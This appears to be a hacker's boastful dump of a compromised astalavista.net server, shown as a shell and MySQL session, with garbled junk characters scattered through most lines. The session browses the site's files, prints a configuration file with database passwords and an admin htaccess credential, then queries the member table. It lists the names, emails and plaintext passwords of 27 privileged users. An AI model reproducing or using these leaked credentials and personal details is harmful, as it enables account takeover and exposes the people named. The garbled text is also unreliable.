[~] Lets take a look there, after all… they are hack-proof, aren’t they?!$ B2 M1 I: M% J! \9 _
" E1 b8 N2 H+ f: j& Z
[-] Tricky task: Find home dir of astalavista.net- c/ u) G1 e) H8 [: E

4 _. M$ f: R: B  x, F6 {! qsh-3.2$ ls -la ~astanet, Z* I4 S  I, ~! w) d8 _8 ~
total 48
" D- z5 Q/ r2 X# N/ B# m; bdrwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
# g. z9 Z6 U# D" U7 y, \  q$ A) Odrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
( z' ~5 O* G, mdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
4 p- c& ^; H9 a2 _-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
. n2 ^: ^; ^( P0 \2 ]-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout+ c. y8 }4 Q6 D: f) r1 A& M! w9 q
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
7 o6 a0 J- i9 Y' s) \' Y$ _-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc- Y' p5 O# t/ n6 ~# H- l# W
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
4 C# K1 ?9 o+ s" F+ Tdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap5 H/ Z- ~* s* s) Q1 B
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail4 }# c" m# X9 A
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
% B7 w& S& b# \: T; f-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
+ W! X5 [$ K  [& Q  W; w3 U
  A7 G+ W8 o- ^" b4 ysh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
) z. x1 F2 f, T  W$ y0 Gsh-3.2$ ls -la
" n! _6 A. W4 f6 Rtotal 200
7 H' F5 Q/ V6 r& R! ~drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
- G1 n+ R0 T- \: V' ldrwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ... E3 b4 k, Y) F! X) U2 Z; e8 g
drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007# _3 q2 u  ]1 i/ D* i& Z  M* I
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql: v/ Y% J1 O8 V4 J
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
& G4 f" L1 ~* @: {9 S2 n/ @  \: Vdrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend  l; i: m0 @, t; I. ]5 x5 l
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner+ `( }$ [3 q- a& E2 `
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
2 t) h6 m  k2 p2 O7 ndrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
  |4 L) O& t" x) C( T+ _1 {drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
7 |) h) Z8 {$ J- G, w* X% }drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
, X" C2 `: V. \- \3 y-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
6 v: @5 A8 Z1 c5 R( r9 |-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico: V, n& j3 t. d  P' n2 R
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
4 z9 j+ k+ U* I6 |. K* adrwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour  t7 b. a6 x3 X' r/ R
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess! g+ F5 ~2 S' p8 j2 r
-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess
4 b$ `  m! s% r. \* Q: i$ k-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php; i$ K( [( ]  o8 W+ k6 c4 D4 D
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html' V5 A& K0 P4 X+ ?" E& n
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php
; @9 y7 I" @5 i/ i-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php- @& ]% X  W/ E! w5 X% |
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
; R& k1 `  |: f0 K' ^4 {2 W! Xdrwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
% ?  S9 K( ~% k4 l& p% o; T& bdrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
# Y  G/ d  {/ s2 g" n2 F3 {drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib2 g4 \7 e7 e& p! {7 P( V8 ^% G
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
2 Z6 p( \+ h5 [# |- {1 m$ Fdrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
- e/ k6 i& h2 k, p' B) s1 ydrwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata% j" E3 |# E& R# o: n
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new; C$ n! h- [9 R7 b. l) n$ T
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf+ i. `9 k2 ]2 p! g4 ?
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
4 p$ t; ^8 c- B; M: B2 l. `-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
3 E# a4 b7 r; edrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss$ d; Q6 Y( [6 c
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources0 k- o8 B" z5 g
drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com% E) {& Z: S) i9 K$ |' [
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes+ ]. N7 D( P) f1 p& u' z4 H
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src, _/ H8 U. w5 a' O
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
% E8 `) K) j3 ddrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2( c% S6 {) x7 m2 o+ Q! {& X
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old/ p7 M6 e! j/ H9 H8 t2 @+ V; S
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
3 ]5 M+ P0 a$ ~  a& ]/ ^1 ~6 Fdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
: X2 a; X! d6 f1 Z$ @& r+ C
0 b& b* z' _* K+ R% A9 rsh-3.2$ head -20 index.php; H5 F- @+ x+ J, F" k' W
<?PHP
4 d: h: k, d# i- \$ r/*** m; _% V8 O' f) y) A, x
* Mainfile (external) for astalavistaNET v2.0: r! s4 s) L9 m" d+ W5 Q0 K
*
2 n$ P9 a' E2 }6 n* @copyright     Astalavista IT Engineering GmbH6 y+ h: i3 A. L: [2 _. b2 e( G
* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
, u& p  D) G& u0 A$ c% d% m, J* @version       1.0
7 v& H& _* ^- K*/
- n  m' s5 e) V$ A" C& J* z  ?1 o' M7 J. f, {0 a: v
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
/ T6 V, S7 H" Q4 h9 ?8 g                $dontStartSession = false;5 d. h: `$ W. l  q, v8 G% w0 g
        } else {! Z" Q* M, V) A9 [
                $dontStartSession = true;: l6 |. B# P, C0 d# C4 h6 m0 P
        }1 i, I% _2 f8 [( m$ `( x% G5 x: A
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);! K* R7 T# m4 D( C6 [6 b' s% `, j
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
0 v$ b' F- {  ]! ?( l        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);: ~: m( A$ L1 s/ `) K
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
7 R: i. f" ^6 }. k) B8 L& ^& o0 ?/ t- a) k7 u
sh-3.2$ cd config3 x, T" ^0 f) s# d' ]3 G
sh-3.2$ ls -la/ L3 X# r7 k/ p$ `2 b4 I* V
total 32
* D! N: v1 L$ ?drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .  y, c5 h4 z% k( }! q$ ^. q
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 .." z8 `3 u0 }9 X, N: p5 [: ?  l
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php
2 Y% _$ Y( I  d% M( q' w$ \  D-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 |0 V2 [  c5 u( ~
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php# m$ b9 f* v/ P2 I$ P* ]( w6 H4 E
-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php0 _2 ^  l) G# j! ]# W: v" k+ o
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
! D3 [1 v0 W5 D: R7 R% m5 [. V. Z" ^1 `
sh-3.2$ cat com.conf.php  ^$ E2 d, A. ]3 {3 b
[snip]
& s, j7 g7 `% `1 h1 X2 ?2 e. Y//member-database
0 w5 r, l6 e* }6 e% b# z$_CONFIG['db_mem_server']       = ‘localhost’;0 E4 k/ E* c: o' ^& h
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
) t& f& g; k0 M: k6 r( x( ?: y$_CONFIG['db_mem_user']         = ‘astanet_db’;
9 d# p- J! U4 V- [$ ~) O& J7 @$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;$ F3 E- }, W9 \2 i
$_CONFIG['db_mem_debug']        = false; //true or false( ?$ g% e6 v' C. W
//ads-database
  K# X  F' A; v' S4 \5 [- V$_CONFIG['db_ads_server']       = ‘localhost’;
+ h+ r* P, ~5 i# ^# T$_CONFIG['db_ads_database'] = ‘astanet_ads’;
8 ~, h! g2 V6 B$_CONFIG['db_ads_user']         = ‘astanet_db’;
$ m0 g7 w2 W" c+ P9 W) p$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
2 B" @, E( a% B$_CONFIG['db_ads_debug']        = false; //true or false
8 v& t* o: G) a! P' X" ^//rainbow-database
! d2 j8 t2 o/ \% Q/ S( y! E$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;4 W3 `' ~6 d( ~) r: _. `3 i- e& i# h
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
4 o; e$ n- e" k$_CONFIG['db_rainbow_user']     = ‘dinu’;9 e1 e4 S- F& {( Q8 ~/ Q0 \
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
: E) A! r4 Q% M9 ?4 {3 S* n$_CONFIG['db_rainbow_debug']    = false; //true or false
' ~0 E: J* \$ S+ T//mailing lists database! Z7 D) S8 \8 \1 G  d
$_CONFIG['db_mailing_lists_server']     = ‘localhost’;
$ w! B( Q9 O# w$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;
9 u( x! F8 p( x8 h  R$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;% E& x# t$ r( ?# M( N" Q( H
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
* z  b3 p9 `% S$_CONFIG['db_mailing_lists_debug']              = false; //true or false
/ t$ k* ]) m; M* O. x$ F' J/ a//paypal
+ E: P; t  x" U$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;3 }0 b( e2 C9 n  x( F- T* ?
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;8 \8 n% z+ }( L% ^, K" o* W
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;9 C+ v) x6 A: \9 Z* B8 [
$_CONFIG['sub_pp_noship']       = ‘1′;! p' B( Q9 I/ D' @: o/ |4 k
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;" _$ U- ?' L& Z: w+ @
[snip]8 P( e) q& h0 K! S/ \7 S! g
6 C5 f4 n6 P% u& c8 ]  l: L; K
sh-3.2$ cd ..! Q; D/ g- @7 i* ^' T& u. C. F
sh-3.2$ cd member
8 \' k7 ~) d5 p" G$ }0 [2 A0 z) q6 Wsh-3.2$ ls -la
: s! y" @+ ?9 d0 Vtotal 20
% u" `5 s, Y2 i) \6 N% Tdrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
3 \: ~/ E  Y, e! n( Ldrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
1 `/ }6 W7 w) O1 H* w- G3 e-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
; Q$ Y% [$ t5 s! x  R-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php6 Q% h' ]7 U! u/ A. ~/ V
sh-3.2$ cat .htaccess
% s! K8 u2 v( y5 JSecFilterEngine off& `) z$ {% _4 E2 J6 Y  g& G6 M

$ _4 z9 n, V3 M: D/ b& hsh-3.2$ cd ..- q# G8 X4 [( l# ~9 N$ S5 l
sh-3.2$ cd cron
( i" A% Q. N  F7 M, E. xsh-3.2$ ls -la# k: @. i7 W6 H6 Y. g1 l) r
total 168
4 \# e* ~& P9 m1 F8 K4 _drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .* m! t% R8 J% o, ~3 m6 A5 H( b$ Y
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..% R+ \5 i6 M4 d. U% t; Y, Z+ f9 o
-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php
3 u. S# D* ^  N# U4 O-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php+ D- a4 {6 l3 `5 T# ~8 F
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
( K! ~. i  n9 g+ b-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php  U, U$ j, {5 ^
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php, R% ^' x$ y$ @1 a% ?
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php% u7 B8 X$ N3 B$ I6 e) v# P, q
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
7 Q8 @0 A, L) a. d1 ]-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php3 W3 ^! @' }2 n, c4 H' ~2 V
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
* A: D8 D" u6 c1 m2 |3 u# Q-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
$ p4 U4 C' b9 Q, m4 p: W-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php# \" `% X& @- K  ]8 i" g
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php1 m# [; w; e  ?$ }; Q! b
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh8 D  Q! ]4 J# \
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
) Y- {, v# h% i% L6 N9 |-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php5 E* \9 w8 I( n0 K) u0 G* p& K
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
3 d; K' V" ^; p6 h-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php+ B. W% m+ `! O% c
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php# x5 }% |) p/ m8 F( A7 t( [( @8 ^! M
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
7 i+ D8 n4 \/ s. {8 |-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
' j; k% B2 q; d* |-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
9 y9 H1 y1 Z+ I* l" ?* b$ d
/ u7 |: j/ k  I4 B6 N+ T& Ssh-3.2$ cd ..9 j, k! ^8 D5 l; a& ~- J+ c: \9 ^
sh-3.2$ cd _007
/ u3 X8 \/ ~/ S4 m/ zsh-3.2$ ls -la: j, |' B3 W! _8 n! e  s" P8 {
total 24
- J2 y2 \5 F# odrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .
2 W* j/ {/ c) X3 [7 |% [0 ~6 |* N6 g& Udrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..) y' H- ?6 n; m8 [2 F4 e
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
3 e0 J# @* l5 }- `-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
9 J! C" y/ R- T, P0 |# e-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
  E- g# Z( L- J: h; m  ]0 o, o; Pdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap
! |( [6 k" x/ G6 h6 O
2 n# S" r8 `7 `" f9 _" `' zsh-3.2$ cat  .htaccess
6 ~1 c  O8 l! N2 R& |" R# EauthType Basic
. ^4 z1 Q4 _8 pauthName Admin
. x6 r2 L! C8 c- cauthUserFile /home/astanet/auth/.htadm_pwd
) b& Q/ F3 V  m: irequire valid-user1 v* b  R. L- F; T1 F
  W/ g4 I& d+ I
sh-3.2$ cat /home/astanet/auth/.htadm_pwd# h2 C; D8 B& D: C; r
admin2net:CR0bl65MwhfT
+ P8 q  p0 `5 _4 K
2 w+ ?7 C+ Z9 m3 n* esh-3.2$ mysql -u astanet_db -p
" J9 m$ ]7 U0 o) `  f3 sEnter password:0 O8 J' S3 n7 z- }, A8 I* Q7 f" C+ C+ }6 c
Welcome to the MySQL monitor.  Commands end with ; or \g.
: e, V# [( A/ n1 ^Your MySQL connection id is 2751536 A) d# Z$ E. Q( ]7 o* G
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
7 A) B$ a) m% y6 M4 K0 }7 P3 t' f/ q1 d
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 i* ~( }, O% s8 [( T& s" p

* ]9 E+ J/ \# l" I& s0 Z0 vmysql> show databases;  w9 L& C: l* z% u! w
+———————–+
; b0 ]" A8 D- n5 J| Database              |4 t2 {- G! ?9 t: A# D, l. ^
+———————–+  B- J6 j7 e0 M0 q2 h- o6 _
| information_schema    |& E2 U+ z4 v- ]& w% e- b# q
| astanet_ads           |' G/ `, @3 b7 }' X+ t( l/ `% y: D+ ?
| astanet_mailing_lists |$ f" k6 d; q- }5 ?' ^% a# P; N
| astanet_mediawiki     |
; T+ n4 {- x+ X$ |8 O, r| astanet_membersystem  |
6 L2 Q/ d( _9 X1 R1 Q| test                  |& _6 i2 h  u$ G6 D% R% `7 Q' J
+———————–+/ @5 g# E* k2 M; W5 u
6 rows in set (0.00 sec)4 r6 m5 i+ p0 N+ W: R& K& T5 Q
% h7 C) j  M7 m+ p6 z
mysql> use astanet_membersystem
1 [: i5 R5 ]+ R2 u9 ZDatabase changed
" U' A4 u0 l( {. u& q: o+ b3 mmysql> show tables;% h' r5 |+ A$ H6 W4 l
+———————————–+& ~1 a6 `& v5 A# |* L% e
| Tables_in_astanet_membersystem    |
7 R7 k7 v2 _& N; Y+———————————–+
; \7 i8 r2 r* F  \| blacklist_categories              |( k. p, B# Y% L, m
| blacklist_content                 |- F" A) {3 i3 p/ ^/ ]6 J) u
| blacklist_levels                  |
7 W5 t7 ~" E+ Z| blacklist_mcset                   |
# Z4 ?: Q4 y* i: m, |* C! ^) m| dir_categories                    |2 M- q" n5 c& @# s% _# m
| dir_comments                      |- V2 A7 u) o9 N- v( z9 i# M
| dir_links                         |% y. ]& P1 P/ p
| dir_temp                          |% O" y1 k3 }/ e" o$ N$ o
| dir_votes                         |8 T% R# Z  |8 I/ O3 U- ]( H
| documents                         |
$ y7 N( C0 B* F3 L# S, v! E/ Q* N  `/ o| documents_categories              |
4 A: W3 D) |& \, s9 s| email_content                     |7 }) F/ O; W3 G/ z3 L8 g" f
| email_settings                    |4 o/ x2 C; m4 }9 ]( y
| exploits                          |
; r. I/ p1 ^- A4 O4 d# S' Y| exploits_categories               |) ~9 S) }1 [# f1 j5 c7 K- J
| exploittree_categories            |
8 C! l2 U& b* X( {6 F" n| exploittree_exploits              |: o, n+ r5 n9 r( r, E  F: D8 X1 \# W
| home_values                       |
; l' s2 ]# |& b: ^| iso_countries                     |* Q) N9 C* f* [6 Y! m
| links_categories                  |8 e1 O0 F. F* J$ X
| links_records                     |
7 o& Q6 B. v) ?5 H/ x| links_unauth                      |+ n  F; i2 q3 h1 j; D$ Q. X
| links_votes                       |
5 I& f+ J+ {! g2 R| log                               |" ?: J4 {7 d' r3 _# O9 a  V6 L
| news_categories                   |
0 d- \( x8 z; B" I| news_comments                     |
' J7 ?9 G$ m+ c# H| news_emoticons                    |7 O, v- r: `' H  K. c! G) i2 q
| news_latest                       |" O8 W: x1 d5 l) ~* t$ T, [( u
| news_messages                     |' Y1 ?! x6 e6 _- _
| news_statistics                   |9 J2 c4 y- {7 l0 @
| news_votes                        |
+ h' \, g( E4 Y$ ~3 y| prices_content                    |
: w5 U' E- T, s, v3 ]2 q" a| prices_offers                     |6 ^6 P# h2 E0 d! j9 P! x
| rss_settings                      |
$ u0 d& I! O  Z# C4 S$ E| sessions                          |
/ o% c  q& A+ d+ h: @| stats_signups                     |/ L& V  R, U1 L! w- z7 M4 F: O, Q
| u2u2                              |
/ q* e  P9 k( A( ?. M/ C| u2u_contact                       |
2 V/ G; C0 M  I, v  U! E| u2u_settings                      |
0 e6 g' ~% q; T! }- B- y| user_keywords_selected_categories |6 v( M: A* q2 P6 B0 }( E
| users                             |! m8 `) J( L- ^" m3 F
| users_ipn_test                    |  N8 D; s7 Z0 H  \# d5 t- o5 C! k
| users_keyword_values              |
, W  Y4 r' L9 [, r" q$ U| users_profile                     |
( U: w9 ^% w3 r4 M$ V1 _| users_temp                        |
1 s1 I( v+ s; c# k| users_upgrade                     |
# E# n& S9 S$ {+———————————–+
+ d& D& W" f# d& H" Y: d" V46 rows in set (0.00 sec)% h- D! H& @) F7 ~' J9 D, g. g

3 A' [" g0 n3 O# n# D5 Emysql> describe users;# t. R/ v0 u, J0 O: M+ p) G* f
+————————–+————————————–+——+—–+———————+—————-+: q; v( K) G9 M# C# ^
| Field                    | Type                                 | Null | Key | Default             | Extra          |
: @: e  E; F2 [( m0 q+————————–+————————————–+——+—–+———————+—————-+  M# d. w( j% ]2 M( |' h; ~
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
' ]# k9 T# Z$ K6 k2 N' ]5 e# D| user                     | varchar(50)                          | NO   |     |                     |                |, W6 W5 ]7 C' m
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
, v9 L) P- E" k  ]5 K+ }| password                 | varchar(30)                          | NO   |     |                     |                |: S8 e; Q4 R- P9 f) ~
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |9 h' ]1 F  u+ o6 J+ B. n# @7 ?
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |: g. x1 R# E: J' {
| email                    | varchar(50)                          | NO   |     |                     |                |# }8 C' v4 z' X% n7 c$ m
| ip                       | varchar(15)                          | NO   |     | 0                   |                |8 C6 f, d  M8 i( |- i3 y- ?; V% D
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |0 M# p* k! l" h) L. M6 ?7 U/ I
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
$ h( g5 d+ a' p& [| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |" h# r6 a& J/ n1 m% A
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
. r" h1 C& F# A+ y! ?  l# S" `| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
! |# U* A, C0 }( J| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |
' {% ^7 _0 {7 s6 b' ]# \| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |4 e9 }/ ]$ M  `
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
, L$ y1 F$ |+ t) t/ \7 I1 l| lang                     | tinytext                             | NO   |     |                     |                |
2 F  }4 {( R8 N3 Q2 a) x) m: Y1 w| adid                     | smallint(6)                          | NO   |     | 0                   |                |
8 M( A, q" q' k5 H6 I2 I: X| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
; E" e! a  p4 U; I  a| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
0 {( `. |. j( H3 ~9 {2 Z| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
: ~) i8 `9 x4 d0 U: v. z% Y4 q| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |8 v: t: c4 a! S
+————————–+————————————–+——+—–+———————+—————-+
4 h) V) ?- J7 Z0 v+ N7 g22 rows in set (0.01 sec)
- h( T3 D6 ]! @% p. a8 @  W& d8 ]" J2 R3 W, }- c, J
mysql> select count(*) as skids from users;
% i  P; ?: |* H+——-+* q# n% k. i& ]5 Z. p  T% G. F
| skids |; T  y& w1 ]) O8 Z% O
+——-+
) W/ l' W+ {! q) j7 _| 25199 |  o7 J! R* j7 c, _
+——-+
; x. |1 Z* j! ?( q1 N1 row in set (0.00 sec)
  H" W, H+ [& o0 h$ W7 d! `& n4 d1 e8 r
mysql> select user,nickname,password,email from users where userlevel = 1;
$ H# b. P1 q. f& k2 }+————————–+———————-+——————+———————————–+8 F+ D, ]8 g# ~5 F: ?( {
| user                     | nickname             | password         | email                             |
& J% K3 q/ S% Q+————————–+———————-+——————+———————————–+
$ R  k. W& p6 ~+ E2 H4 L) u& l| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |) S. ~) s! P. K& c
| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |9 D& O+ ]7 J7 r: O  [4 s# ^$ [
| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |& R2 {4 O: y' k! {% a& Y
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
9 {6 O3 ?$ v, T  [, z  n2 r% U| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |; u2 A$ J! r' F% E
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |1 \: n8 W8 u5 w
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
# ~: f0 z) ]6 n* t7 Q- C; @: Q9 V4 D| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
; }4 [* M" s% o| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |
) E# y4 U& W# p$ `; ?% [| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |- `" \. p* X3 N+ G2 D, B% ~' P
| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |  L- \5 g' g2 c1 V
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |8 R0 c# E9 y# S) \  X
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |( ?- P5 Y8 B1 U: s
| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |0 F7 A/ Z8 ^/ G3 z+ c6 W. |+ K
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |
; {& q" j) Y2 g/ Z| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |: ^: Q  L& ^6 e" m
| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |% |% I! }% `1 @
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
2 V0 ^3 ^3 M7 l! ~9 Q| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |( w# N* z- P- `+ K* S% }
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |" s1 g$ g" B- C! k. Y2 ^$ c
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
( H. I- a1 m4 }3 K0 F; ?| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |$ {; K4 B& e+ q+ D7 t
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |; Y8 R' a$ ?1 A1 }, x9 j$ C
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |/ y) ?& N5 W9 v: M
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |
* i* M9 U: F" k& x. r| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |& U7 D, P8 Z8 f! x2 i% j2 d) p
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
  _; t; Y8 ?4 @1 X+————————–+———————-+——————+———————————–+
7 k4 p' s% M4 H: }# U27 rows in set (0.00 sec)# R, H  G! }( b3 b; r! D" v

: @% u, W9 m/ ]6 H( L+ pmysql> exit;4 f0 j6 R. T9 e" b# h& b0 |5 e" w
Bye; b1 B8 \9 @2 S6 j5 T* M/ c

